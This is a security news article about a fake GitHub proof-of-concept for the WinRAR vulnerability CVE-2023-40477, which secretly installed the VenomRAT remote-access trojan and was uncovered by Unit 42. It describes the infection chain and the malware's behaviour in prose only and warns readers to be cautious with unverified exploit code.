Beware: WinRAR Vulnerability PoC Exposed
A hacker recently posted a fake proof-of-concept (PoC) exploit for a previously patched WinRAR vulnerability, which is a concerning revelation. The goal of this malevolent operation was to infect unsuspecting downloaders with the infamous VenomRAT virus. While the immediate threat has been mitigated, this incident highlights the risks of simply accepting PoCs obtained from services such as GitHub without sufficient testing for safety.
Discovery of the Fake PoC
The fake PoC exploit was discovered by cybersecurity professionals from Palo Alto Networks’ Unit 42 team. On August 21, 2023, the attacker posted this malicious code to GitHub. The attempt was fortunately foiled, but the episode serves as a clear reminder of the risks inherent with unverified PoCs.
The fabricated PoC exploited the CVE-2023-40477 vulnerability, which allowed for arbitrary code execution when customized RAR files were opened in WinRAR versions prior to 6.23. Trend Micro’s Zero Day Initiative discovered the WinRAR software vulnerability on June 8, 2023, although it wasn’t officially reported until August 17, 2023. The WinRAR security update quickly fixed this problem in version 6.23, which was released on August 2.
The Swift Actions of the Threat Actor
An entity calling itself “whalersplonk” seized the opportunity quickly, disguising malware as an exploit code for the new WinRAR security flaw. To give their malicious package legitimacy, the threat actor published a summary in the README file, as well as a demonstration video on Streamable detailing how to use the PoC.
What the Unit 42 crew discovered, on the other hand, was concerning. The ostensibly Python PoC script turned out to be a modified version of a publicly available exploit targeted for a separate vulnerability, CVE-2023-25157. This distinct bug was a significant SQL injection vulnerability that affected GeoServer.
The VenomRAT Menace
Instead of launching the planned exploit, the false WinRAR PoC developed a batch script. This script, in turn, downloaded and executed an encoded PowerShell script on the infected host. The end result? The VenomRAT malware entered the system, triggering a series of malicious actions.
When launched on a Windows device, VenomRAT started a key logger. This frightening piece of software logged every keystroke and saved the data to a local text file. Following that, the virus communicated with a command and control (C2) server, where it received a slew of alarming commands. These commands ranged from activating registry-stored plugins to deleting Software registry subkeys. The malware could even calculate the duration between pings to the C2 server.
Given VenomRAT’s ability to deploy further payloads and steal important credentials, those who executed the false PoC should reset their passwords across all accounts and environments.
A Strategic Deception of The WinRAR Vulnerability
According to the timetable established by Unit 42, the threat actor methodically developed the attack infrastructure and payload well in advance of the public announcement of the WinRAR exploit. This deliberate approach implies that the same attacker may, in the future, take advantage of the increased security community attention surrounding freshly disclosed vulnerabilities to propagate additional deceptive PoCs for multiple issues.
A Broader Threat Landscape
The release of fraudulent PoCs on platforms such as GitHub is not an uncommon instance. Cybercriminals and security researchers are both frequently targeted by threat actors. Researchers discovered thousands of GitHub repositories pushing bogus PoC exploits for numerous zero-day vulnerabilities as early as late 2022. Many of these shady repositories were infected with malware, malicious PowerShell scripts, hidden info-stealer downloaders, and even Cobalt Strike droppers.
Vigilance is essential in the ever-changing arena of cybersecurity threats. The advent of counterfeit PoCs serves as a clear reminder that trust should not be granted indiscriminately, especially in the field of cybersecurity research and testing. Always use caution when dealing with PoCs from unknown sources, and be proactive in putting in place strong security measures to protect your systems from malicious attacks.